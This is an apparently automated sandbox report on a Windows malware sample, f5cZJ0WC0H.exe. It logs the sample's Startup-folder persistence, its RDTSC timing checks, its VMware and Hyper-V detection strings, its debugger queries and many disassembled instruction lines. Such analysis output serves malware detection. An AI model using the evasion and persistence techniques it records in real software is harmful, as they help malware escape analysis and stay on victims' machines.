          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000005098E4 second address: 00000000005098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000000509B4E second address: 0000000000509B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000004C98E4 second address: 00000000004C98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000004C9B4E second address: 00000000004C9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_00409A80 rdtsc 21_2_00409A80
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2538Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1867Jump to behavior
          Source: C:\Windows\SysWOW64\timeout.exe TID: 5992Thread sleep count: 42 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2968Thread sleep count: 2538 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6108Thread sleep count: 1867 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6176Thread sleep count: 48 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7016Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6180Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe TID: 5492Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe TID: 6504Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5312Thread sleep time: -36000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe:Zone.IdentifierJump to behavior
          Source: powershell.exe, 00000005.00000002.348181371.0000000005AE4000.00000004.00000001.sdmpBinary or memory string: Hyper-V
          Source: explorer.exe, 00000016.00000000.370431317.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000016.00000000.392662221.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000016.00000000.370673223.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000016.00000002.502838967.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000016.00000000.394362112.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000016.00000000.381954459.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000016.00000000.392662221.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000016.00000000.392662221.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000016.00000000.394362112.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: powershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
          Source: explorer.exe, 00000016.00000000.392662221.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess queried: DebugFlagsJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess queried: DebugObjectHandleJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess queried: DebugFlagsJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess queried: DebugObjectHandleJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess queried: DebugFlagsJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess queried: DebugObjectHandleJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_00409A80 rdtsc 21_2_00409A80
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0040ACC0 LdrLoadDll,21_2_0040ACC0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01119100 mov eax, dword ptr fs:[00000030h]21_2_01119100
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01119100 mov eax, dword ptr fs:[00000030h]21_2_01119100
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01119100 mov eax, dword ptr fs:[00000030h]21_2_01119100
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114513A mov eax, dword ptr fs:[00000030h]21_2_0114513A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114513A mov eax, dword ptr fs:[00000030h]21_2_0114513A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01134120 mov eax, dword ptr fs:[00000030h]21_2_01134120
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01134120 mov eax, dword ptr fs:[00000030h]21_2_01134120
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01134120 mov eax, dword ptr fs:[00000030h]21_2_01134120
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01134120 mov eax, dword ptr fs:[00000030h]21_2_01134120
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01134120 mov ecx, dword ptr fs:[00000030h]21_2_01134120
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113B944 mov eax, dword ptr fs:[00000030h]21_2_0113B944
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113B944 mov eax, dword ptr fs:[00000030h]21_2_0113B944
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0111B171 mov eax, dword ptr fs:[00000030h]21_2_0111B171
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0111B171 mov eax, dword ptr fs:[00000030h]21_2_0111B171
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0111C962 mov eax, dword ptr fs:[00000030h]21_2_0111C962
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01142990 mov eax, dword ptr fs:[00000030h]21_2_01142990
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113C182 mov eax, dword ptr fs:[00000030h]21_2_0113C182
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114A185 mov eax, dword ptr fs:[00000030h]21_2_0114A185
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011951BE mov eax, dword ptr fs:[00000030h]21_2_011951BE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011951BE mov eax, dword ptr fs:[00000030h]21_2_011951BE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011951BE mov eax, dword ptr fs:[00000030h]21_2_011951BE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011951BE mov eax, dword ptr fs:[00000030h]21_2_011951BE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011461A0 mov eax, dword ptr fs:[00000030h]21_2_011461A0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011461A0 mov eax, dword ptr fs:[00000030h]21_2_011461A0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011969A6 mov eax, dword ptr fs:[00000030h]21_2_011969A6
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0111B1E1 mov eax, dword ptr fs:[00000030h]21_2_0111B1E1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0111B1E1 mov eax, dword ptr fs:[00000030h]21_2_0111B1E1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0111B1E1 mov eax, dword ptr fs:[00000030h]21_2_0111B1E1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011A41E8 mov eax, dword ptr fs:[00000030h]21_2_011A41E8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E4015 mov eax, dword ptr fs:[00000030h]21_2_011E4015
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E4015 mov eax, dword ptr fs:[00000030h]21_2_011E4015
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01197016 mov eax, dword ptr fs:[00000030h]21_2_01197016
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01197016 mov eax, dword ptr fs:[00000030h]21_2_01197016
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01197016 mov eax, dword ptr fs:[00000030h]21_2_01197016
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0112B02A mov eax, dword ptr fs:[00000030h]21_2_0112B02A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0112B02A mov eax, dword ptr fs:[00000030h]21_2_0112B02A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0112B02A mov eax, dword ptr fs:[00000030h]21_2_0112B02A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0112B02A mov eax, dword ptr fs:[00000030h]21_2_0112B02A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114002D mov eax, dword ptr fs:[00000030h]21_2_0114002D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114002D mov eax, dword ptr fs:[00000030h]21_2_0114002D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114002D mov eax, dword ptr fs:[00000030h]21_2_0114002D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114002D mov eax, dword ptr fs:[00000030h]21_2_0114002D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114002D mov eax, dword ptr fs:[00000030h]21_2_0114002D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01130050 mov eax, dword ptr fs:[00000030h]21_2_01130050
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01130050 mov eax, dword ptr fs:[00000030h]21_2_01130050
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E1074 mov eax, dword ptr fs:[00000030h]21_2_011E1074
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D2073 mov eax, dword ptr fs:[00000030h]21_2_011D2073
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01119080 mov eax, dword ptr fs:[00000030h]21_2_01119080
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01193884 mov eax, dword ptr fs:[00000030h]21_2_01193884
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01193884 mov eax, dword ptr fs:[00000030h]21_2_01193884
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114F0BF mov ecx, dword ptr fs:[00000030h]21_2_0114F0BF
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114F0BF mov eax, dword ptr fs:[00000030h]21_2_0114F0BF
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114F0BF mov eax, dword ptr fs:[00000030h]21_2_0114F0BF
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011420A0 mov eax, dword ptr fs:[00000030h]21_2_011420A0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011420A0 mov eax, dword ptr fs:[00000030h]21_2_011420A0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011420A0 mov eax, dword ptr fs:[00000030h]21_2_011420A0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011420A0 mov eax, dword ptr fs:[00000030h]21_2_011420A0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011420A0 mov eax, dword ptr fs:[00000030h]21_2_011420A0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011420A0 mov eax, dword ptr fs:[00000030h]21_2_011420A0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011590AF mov eax, dword ptr fs:[00000030h]21_2_011590AF
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011AB8D0 mov eax, dword ptr fs:[00000030h]21_2_011AB8D0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011AB8D0 mov ecx, dword ptr fs:[00000030h]21_2_011AB8D0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011AB8D0 mov eax, dword ptr fs:[00000030h]21_2_011AB8D0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011AB8D0 mov eax, dword ptr fs:[00000030h]21_2_011AB8D0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011AB8D0 mov eax, dword ptr fs:[00000030h]21_2_011AB8D0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011AB8D0 mov eax, dword ptr fs:[00000030h]21_2_011AB8D0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011158EC mov eax, dword ptr fs:[00000030h]21_2_011158EC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D131B mov eax, dword ptr fs:[00000030h]21_2_011D131B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E8B58 mov eax, dword ptr fs:[00000030h]21_2_011E8B58
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0111F358 mov eax, dword ptr fs:[00000030h]21_2_0111F358
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0111DB40 mov eax, dword ptr fs:[00000030h]21_2_0111DB40
